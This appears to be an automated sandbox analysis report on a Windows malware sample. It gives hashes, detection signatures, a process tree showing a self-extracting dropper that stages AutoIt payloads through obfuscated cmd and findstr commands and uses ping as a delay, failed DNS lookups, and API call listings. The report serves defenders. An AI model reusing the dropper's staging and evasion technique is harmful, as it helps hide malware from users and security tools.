
Windows Analysis Report
Tt843YGUx5.exe

Overview

General Information

Sample name: Tt843YGUx5.exe (renamed because the original name is a hash value)
Original sample name: 0d6bbe5907ca581fec7c452793aa1257.exe
Analysis ID: 1610406
MD5: 0d6bbe5907ca581fec7c452793aa1257
SHA1: 103b6e60ec864afc723f9fd0f8c29f91a0fcc4c7
SHA256: a1734a3cebd107003588c3b860dd235827515439325aa5bd07dbe3e798cd2e48
Tags: exe, user-abuse_ch

Detection

Score: 80
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Contains functionality to register a low level keyboard hook
Drops PE files with a suspicious file extension
Joe Sandbox ML detected suspicious sample
Obfuscated command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Tt843YGUx5.exe (PID: 6768 cmdline: "C:\Users\user\Desktop\Tt843YGUx5.exe" MD5: 0D6BBE5907CA581FEC7C452793AA1257)
    • cmd.exe (PID: 7008 cmdline: "C:\Windows\System32\cmd.exe" /c cmd < Seminato.vstm MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7104 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • findstr.exe (PID: 7156 cmdline: findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • Inebriarti.exe.com (PID: 6164 cmdline: Inebriarti.exe.com A MD5: C56B5F0201A3B3DE53E561FE76912BFD)
          • Inebriarti.exe.com (PID: 4192 cmdline: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com A MD5: C56B5F0201A3B3DE53E561FE76912BFD)
        • findstr.exe (PID: 2200 cmdline: findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • Bonta.exe.com (PID: 2032 cmdline: Bonta.exe.com m MD5: C56B5F0201A3B3DE53E561FE76912BFD)
          • Bonta.exe.com (PID: 2104 cmdline: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com m MD5: C56B5F0201A3B3DE53E561FE76912BFD)
        • findstr.exe (PID: 1440 cmdline: findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • Pensiero.exe.com (PID: 2196 cmdline: Pensiero.exe.com E MD5: C56B5F0201A3B3DE53E561FE76912BFD)
          • Pensiero.exe.com (PID: 6496 cmdline: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com E MD5: C56B5F0201A3B3DE53E561FE76912BFD)
        • PING.EXE (PID: 2496 cmdline: ping 127.0.0.1 -n 30 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: Tt843YGUx5.exe | Avira: detected
Source: Tt843YGUx5.exe | Virustotal: Detection: 31%
Source: Tt843YGUx5.exe | ReversingLabs: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 96.1% probability
Source: Tt843YGUx5.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Code function: 0_2_00409054 ??2@YAPAXI@Z,FindFirstFileW,FindClose,0_2_00409054
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Code function: 0_2_00403186 FindFirstFileW,FindClose,SetLastError,CompareFileTime,0_2_00403186
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Code function: 0_2_00402A8E FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402A8E
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Code function: 0_2_00402B9F FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,0_2_00402B9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007C494A GetFileAttributesW,FindFirstFileW,FindClose,5_2_007C494A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_007C4005
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_007CC2FF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007CCD14 FindFirstFileW,FindClose,5_2_007CCD14
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_007CCD9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_007CF5D8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_007CF735
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_007CFA36
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_007C3CE2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00AB494A GetFileAttributesW,FindFirstFileW,FindClose,7_2_00AB494A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00AB4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_00AB4005
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00ABC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_00ABC2FF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00ABCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,7_2_00ABCD9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00ABCD14 FindFirstFileW,FindClose,7_2_00ABCD14
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00ABF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00ABF5D8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00ABF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00ABF735
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00ABFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_00ABFA36
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00AB3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_00AB3CE2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_0043494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_0043494A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_00434005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00434005
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_0043C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0043C2FF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_0043CD14 FindFirstFileW,FindClose,11_2_0043CD14
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_0043CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0043CD9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_0043F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0043F5D8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_0043F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0043F735
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_0043FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0043FA36
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_00433CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00433CE2

Networking

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: unknown | DNS traffic detected: query: OreSqbuLLIH.OreSqbuLLIH replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: NiXfPuxauHolCHyB.NiXfPuxauHolCHyB replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: OEEMOUIIEJHDT.OEEMOUIIEJHDT replaycode: Name error (3)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007D29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,5_2_007D29BA
Source: global traffic | DNS traffic detected: DNS query: OEEMOUIIEJHDT.OEEMOUIIEJHDT
Source: global traffic | DNS traffic detected: DNS query: NiXfPuxauHolCHyB.NiXfPuxauHolCHyB
Source: global traffic | DNS traffic detected: DNS query: OreSqbuLLIH.OreSqbuLLIH
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000000.1685542446.0000000000829000.00000002.00000001.01000000.00000005.sdmp, Bonta.exe.com, 00000007.00000002.1753768535.0000000000B19000.00000002.00000001.01000000.00000006.sdmp, Inebriarti.exe.com, 00000008.00000002.2923052469.0000000000829000.00000002.00000001.01000000.00000005.sdmp, Bonta.exe.com, 0000000A.00000000.1689206168.0000000000B19000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.globalsign.com/repository/0
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.globalsign.com/repository/06

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Code function: 0_2_004083CB SetWindowsHookExW 00000002,Function_0000839D,00000000,00000000 0_2_004083CB
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007D4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_007D4632
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007D4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_007D4830
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00AC4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_00AC4830
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_00444830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00444830
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007D4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_007D4632
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007C0508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,5_2_007C0508
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007ED164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_007ED164
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00ADD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,7_2_00ADD164
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_0045D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_0045D164
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007C4254: CreateFileW,DeviceIoControl,CloseHandle,5_2_007C4254
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007B8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,5_2_007B8F2E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007C5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_007C5778
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00AB5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,7_2_00AB5778
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_00435778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00435778
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_004054200_2_00405420
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040A8400_2_0040A840
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_004138210_2_00413821
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_004189E10_2_004189E1
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040A1A00_2_0040A1A0
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_004182000_2_00418200
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040EA300_2_0040EA30
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00418ABB0_2_00418ABB
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00409B500_2_00409B50
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040BB800_2_0040BB80
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00418D530_2_00418D53
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00409D000_2_00409D00
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040AF000_2_0040AF00
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040AF040_2_0040AF04
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0076B0205_2_0076B020
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007694E05_2_007694E0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00769C805_2_00769C80
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007823F55_2_007823F5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007E84005_2_007E8400
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007965025_2_00796502
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0079265E5_2_0079265E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0076E6F05_2_0076E6F0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078282A5_2_0078282A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007989BF5_2_007989BF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00796A745_2_00796A74
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007E0A3A5_2_007E0A3A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00770BE05_2_00770BE0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078CD515_2_0078CD51
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007BEDB25_2_007BEDB2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C8E445_2_007C8E44
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007E0EB75_2_007E0EB7
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00796FE65_2_00796FE6
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007833B75_2_007833B7
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0077D45D5_2_0077D45D
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078F4095_2_0078F409
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007616635_2_00761663
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0077F6285_2_0077F628
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007816B45_2_007816B4
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0076F6A05_2_0076F6A0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007878C35_2_007878C3
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00781BA85_2_00781BA8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078DBA55_2_0078DBA5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00799CE55_2_00799CE5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0077DD285_2_0077DD28
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078BFD65_2_0078BFD6
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00781FC05_2_00781FC0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A5B0207_2_00A5B020
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A594E07_2_00A594E0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A59C807_2_00A59C80
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A723F57_2_00A723F5
